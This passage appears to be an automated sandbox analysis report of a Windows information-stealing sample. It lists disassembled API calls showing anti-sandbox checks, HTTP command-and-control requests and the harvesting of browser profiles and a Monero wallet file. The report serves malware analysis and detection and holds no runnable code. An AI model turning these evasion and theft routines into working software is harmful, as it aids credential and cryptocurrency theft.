                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: (Pg$(Qg$(Rg$(Sg$(Tg$HPg$HQg$HRg$HSg$HTg$HUg$HVg$HttpQueryInfoA$InternetSetOptionA$hPg$hQg$hRg$hVg$Og$Pg$Qg$Sg
                                  • API String ID: 2238633743-1928899926
                                  • Opcode ID: ebc7d19894625882505d419f58c4940e5c56f3160f38059496bd6eed2e38796f
                                  • Instruction ID: 018516d9a1223d3ab8d1c45453b800a1758b428defc346c87ddc4f57bf53adea
                                  • Opcode Fuzzy Hash: ebc7d19894625882505d419f58c4940e5c56f3160f38059496bd6eed2e38796f
                                  • Instruction Fuzzy Hash: 0B622BB5508200AFC754DFA9ED88B6E37F9F74C301F24871AA689D3674DA3A9841DF12

                                  Control-flow Graph
                                  [graph image not preserved in the text export: basic blocks a85510 to a85ac6 with executed / not executed marking; the StrCmpCA and Sleep call sites appear in the APIs list]
                                  APIs
                                    • Part of subcall function 00A8A820: lstrlen.KERNEL32(00A74F05,?,?,00A74F05,00A90DDE), ref: 00A8A82B
                                    • Part of subcall function 00A8A820: lstrcpy.KERNEL32(00A90DDE,00000000), ref: 00A8A885
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A856A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85857
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A851F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85228
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A852C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85318
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A8532F
                                    • Part of subcall function 00A852C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00A85364
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A85383
                                    • Part of subcall function 00A852C0: lstrlen.KERNEL32(00000000), ref: 00A853AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A8578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00A85A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Tg
                                  • API String ID: 507064821-1752779648
                                  • Opcode ID: 02a1446b0205bc987cd6b67dace1d62dbb918423bb57d0f7c38823b489a1a25a
                                  • Instruction ID: 2b98b8c83b64b47a11272f0de3b1471b9abe1c71f9b87d6c305bc2d262a3e364
                                  • Opcode Fuzzy Hash: 02a1446b0205bc987cd6b67dace1d62dbb918423bb57d0f7c38823b489a1a25a
                                  • Instruction Fuzzy Hash: 5EE13171E10104AADB18FBB0DE96EED7378BF64340F508529B44766491EF386F09CBA2

                                  Control-flow Graph
                                  [graph image not preserved in the text export: basic blocks a817a0 to a819cd with executed / not executed marking; the StrCmpCA and ExitProcess call sites appear in the APIs list]
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00A817C5
                                  • ExitProcess.KERNEL32 ref: 00A817D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: e84aba3eb1213d4dca3e8a77a1effcab10cebc8594c7fe01a4e0af78b32d2e3a
                                  • Instruction ID: af98cf1cb32cf425f5f5bb8b4ca414dd85a39857ba70aabdadc92e7e3f717e87
                                  • Opcode Fuzzy Hash: e84aba3eb1213d4dca3e8a77a1effcab10cebc8594c7fe01a4e0af78b32d2e3a
                                  • Instruction Fuzzy Hash: D65137B4B04209EFDB04EFA4D954FBE77B9BF44744F108449E406AB280E775EA52CB62

                                  Control-flow Graph
                                  [graph image not preserved in the text export: basic blocks a87500 to a8768e with executed / not executed marking; the GetWindowsDirectoryA, GetVolumeInformationA, heap and wsprintfA call sites appear in the APIs list]
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A87542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A8757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A8760A
                                  • wsprintfA.USER32 ref: 00A87640
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$Ph$\
                                  • API String ID: 1544550907-292453683
                                  • Opcode ID: 559a13883d674542af149b53101ec483a8ac47ae208fd9b4bf299355641f1a94
                                  • Instruction ID: 2a57dad7a67cedef4c973490999e50667e2ef95705ad17d1bdf4fe071a934a90
                                  • Opcode Fuzzy Hash: 559a13883d674542af149b53101ec483a8ac47ae208fd9b4bf299355641f1a94
                                  • Instruction Fuzzy Hash: 6541A6B1D04258ABDF10EF94DD45BDEBBB8FF18704F100199F50967280DB79AA44CBA5

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681648), ref: 00A898A1
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681618), ref: 00A898BA
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681660), ref: 00A898D2
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006817B0), ref: 00A898EA
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006817E0), ref: 00A89903
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00688BF8), ref: 00A8991B
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006754A8), ref: 00A89933
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00675588), ref: 00A8994C
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681678), ref: 00A89964
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681690), ref: 00A8997C
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006816A8), ref: 00A89995
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006814F8), ref: 00A899AD
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00675688), ref: 00A899C5
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681510), ref: 00A899DE
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A711D0: ExitProcess.KERNEL32 ref: 00A71211
                                    • Part of subcall function 00A71160: GetSystemInfo.KERNEL32(?), ref: 00A7116A
                                    • Part of subcall function 00A71160: ExitProcess.KERNEL32 ref: 00A7117E
                                    • Part of subcall function 00A71110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A7112B
                                    • Part of subcall function 00A71110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A71132
                                    • Part of subcall function 00A71110: ExitProcess.KERNEL32 ref: 00A71143
                                    • Part of subcall function 00A71220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A7123E
                                    • Part of subcall function 00A71220: ExitProcess.KERNEL32 ref: 00A71294
                                    • Part of subcall function 00A86770: GetUserDefaultLangID.KERNEL32 ref: 00A86774
                                    • Part of subcall function 00A71190: ExitProcess.KERNEL32 ref: 00A711C6
                                    • Part of subcall function 00A87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                    • Part of subcall function 00A87850: RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                    • Part of subcall function 00A87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                    • Part of subcall function 00A878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                    • Part of subcall function 00A878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                    • Part of subcall function 00A878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A86AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00A86AF9
                                  • Sleep.KERNEL32(00001770), ref: 00A86B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86B1A
                                  • ExitProcess.KERNEL32 ref: 00A86B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                   • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 914b5b723abd9b7590e6478fd560ec812766850c94ed17df94abf5622404cf26
                                  • Instruction ID: d7050e1fb4fb6cab2613df2354ef112437d29070b1495b44f2933a52c98acb6b
                                  • Opcode Fuzzy Hash: 914b5b723abd9b7590e6478fd560ec812766850c94ed17df94abf5622404cf26
                                  • Instruction Fuzzy Hash: E3315271E04208ABEB04FBF0DE56BEE7778AF14340F508619F252A6192DF746905C7B2

                                   Control-flow Graph
                                   Basic blocks (node id: address range and calls) with their successor edges:
                                   • 1204: a86af3 → 1205
                                   • 1205: a86b0a → 1207, 1208
                                   • 1207: a86aba-a86ad7 call a8aad0 OpenEventA → 1214, 1215
                                   • 1208: a86b0c-a86b22 call a86920 call a85b10 CloseHandle ExitProcess
                                   • 1214: a86ad9-a86af1 call a8aad0 CreateEventA → 1208
                                   • 1215: a86af5-a86b04 CloseHandle Sleep → 1205
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A86AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00A86AF9
                                  • Sleep.KERNEL32(00001770), ref: 00A86B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86B1A
                                  • ExitProcess.KERNEL32 ref: 00A86B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e0bde07238c7bd1986563b61f08914ef3d7a58dc26f2337271b3b77c3309d8be
                                  • Instruction ID: 08e6ae71595344573947172eb643cb9c1f0b6d8d9b910b0b9a82adc1fc72af6d
                                  • Opcode Fuzzy Hash: e0bde07238c7bd1986563b61f08914ef3d7a58dc26f2337271b3b77c3309d8be
                                  • Instruction Fuzzy Hash: 82F05870E84209ABFB00BBA0DD0ABBEBB34FB18741F108615F952A11D1DBB15940DBA7

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: bc9dd9ed59e2dd19758f745234309a048ad680891ca7da9ce19c62e15ee55171
                                  • Instruction ID: c4b62d525dd4e336a6eaead9507a786f671fddc36e604927d64a2e0305a7b200
                                  • Opcode Fuzzy Hash: bc9dd9ed59e2dd19758f745234309a048ad680891ca7da9ce19c62e15ee55171
                                  • Instruction Fuzzy Hash: 402130B1D00209ABDF14EFA4ED4ABDD7B74FB44350F108625F555A7290DB706609CB91

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A76280: InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                    • Part of subcall function 00A76280: StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                    • Part of subcall function 00A76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                    • Part of subcall function 00A76280: HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                    • Part of subcall function 00A76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                    • Part of subcall function 00A76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: d53006f8232e7172384feeec9420a3e07ae24b38aedfdde288650a185e49dc96
                                  • Instruction ID: f3439906a47ba1fc8d08a9a6f69d1cb120eaf4df2b1d18cd637b3c33dc9ecf77
                                  • Opcode Fuzzy Hash: d53006f8232e7172384feeec9420a3e07ae24b38aedfdde288650a185e49dc96
                                  • Instruction Fuzzy Hash: FA110330D10148A7DB18FF74DE92AED7778AF60340F408555F81A5A592FF356B05C792

                                   Control-flow Graph
                                   Basic blocks (node id: address range and calls) with their successor edges:
                                   • 1261: a71220-a71247 call a889b0 GlobalMemoryStatusEx → 1264, 1265
                                   • 1264: a71273-a7127a → 1267
                                   • 1265: a71249-a71271 call a8da00 * 2 → 1267
                                   • 1267: a71281-a71285 → 1269, 1270
                                   • 1269: a71287 → 1271, 1272
                                   • 1270: a7129a-a7129d
                                   • 1271: a71292-a71294 ExitProcess
                                   • 1272: a71289-a71290 → 1270, 1271
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A7123E
                                  • ExitProcess.KERNEL32 ref: 00A71294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: f47545b307b5efd9c85b7ba1c3ff81eb278de6ecbc69601a317453b9b58b6878
                                  • Instruction ID: ee1af29facf99da51a96f27f5787391ef39d59b134827603f723b103792538a3
                                  • Opcode Fuzzy Hash: f47545b307b5efd9c85b7ba1c3ff81eb278de6ecbc69601a317453b9b58b6878
                                  • Instruction Fuzzy Hash: 82011DB0D44308FAEF10EBE4CD49BDEBBB8AB14705F20C159E709B62C1DB7459458799
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A7112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00A71132
                                  • ExitProcess.KERNEL32 ref: 00A71143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 166f4319cea3a44ea61be736a17d52a79508e60d876fb93f45e68fa93136ae8f
                                  • Instruction ID: a2c79842eabaa44cbf8f81ce789df42cb833192afc885f29ede8e9fe4a229fe3
                                  • Opcode Fuzzy Hash: 166f4319cea3a44ea61be736a17d52a79508e60d876fb93f45e68fa93136ae8f
                                  • Instruction Fuzzy Hash: 90E01D70A4534CFFE7106BA4DD0EF0D76B8EB04B01F508154F74D7A5D0D6B526419699
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00A710B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00A710F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: 9a4c874cc3a2d7a6d08e6627923060969a0f6e2bde3e37a83d574cf0eefff9f2
                                  • Instruction ID: c1a3ec3a44f7b6b659b2ee13f02c8ce204f1903681571d3e611e6febcdb8ab1f
                                  • Opcode Fuzzy Hash: 9a4c874cc3a2d7a6d08e6627923060969a0f6e2bde3e37a83d574cf0eefff9f2
                                  • Instruction Fuzzy Hash: E1F0E271641308BBE7149BA8AC49FAEB7ECE705B15F304548F544E3280D9729E00CAA0
                                  APIs
                                    • Part of subcall function 00A878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                    • Part of subcall function 00A878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                    • Part of subcall function 00A878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                    • Part of subcall function 00A87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                    • Part of subcall function 00A87850: RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                    • Part of subcall function 00A87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                  • ExitProcess.KERNEL32 ref: 00A711C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: f341f4160a56ca8cfcdf5c598ab918313fd36aed3d57449f62010603627dae96
                                  • Instruction ID: 3875f1dfe5983fdbae57c3e52d2d88f861af13efc708d3567f0db5b071a91a4e
                                  • Opcode Fuzzy Hash: f341f4160a56ca8cfcdf5c598ab918313fd36aed3d57449f62010603627dae96
                                  • Instruction Fuzzy Hash: D0E0C2B291430163CA0037F4AD0AB2E338C5B04385F444628FA08D2142FE29E840C766
                                  APIs
                                  • wsprintfA.USER32 ref: 00A838CC
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A838E3
                                  • lstrcat.KERNEL32(?,?), ref: 00A83935
                                  • StrCmpCA.SHLWAPI(?,00A90F70), ref: 00A83947
                                  • StrCmpCA.SHLWAPI(?,00A90F74), ref: 00A8395D
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A83C67
                                  • FindClose.KERNEL32(000000FF), ref: 00A83C7C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: fbca23a20a6b6af1ceb6d04aa25be65dd68230efe0bee379c4bf58e6eac7bb46
                                  • Instruction ID: 2b445fbf5d88d8115179a95f020d6bc779edee06a8fdf512c270d342ac492c9a
                                  • Opcode Fuzzy Hash: fbca23a20a6b6af1ceb6d04aa25be65dd68230efe0bee379c4bf58e6eac7bb46
                                  • Instruction Fuzzy Hash: 6BA131B2A00218ABDF24EF64DD85FEE7378BB58701F044688F64D96141EB759B84CF62
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00A90B32,00A90B2B,00000000,?,?,?,00A913F4,00A90B2A), ref: 00A7BEF5
                                  • StrCmpCA.SHLWAPI(?,00A913F8), ref: 00A7BF4D
                                  • StrCmpCA.SHLWAPI(?,00A913FC), ref: 00A7BF63
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A7C7BF
                                  • FindClose.KERNEL32(000000FF), ref: 00A7C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-726946144
                                  • Opcode ID: 53bf9c9941ec0f2d87296a8d2a9ffcd7f9ebbd5141b59cad3c33a403797f9da8
                                  • Instruction ID: 9f02073bed549099e9017fbb6628c22eff8c9c46361d8078e7eb1d6d4ebe23a4
                                  • Opcode Fuzzy Hash: 53bf9c9941ec0f2d87296a8d2a9ffcd7f9ebbd5141b59cad3c33a403797f9da8
                                  • Instruction Fuzzy Hash: A5422B729101046BDF14FB70DE96EED737DAFA4300F408559F50AA6191EF38AB49CBA2
                                  APIs
                                  • wsprintfA.USER32 ref: 00A8492C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  • StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                  • StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                  • FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
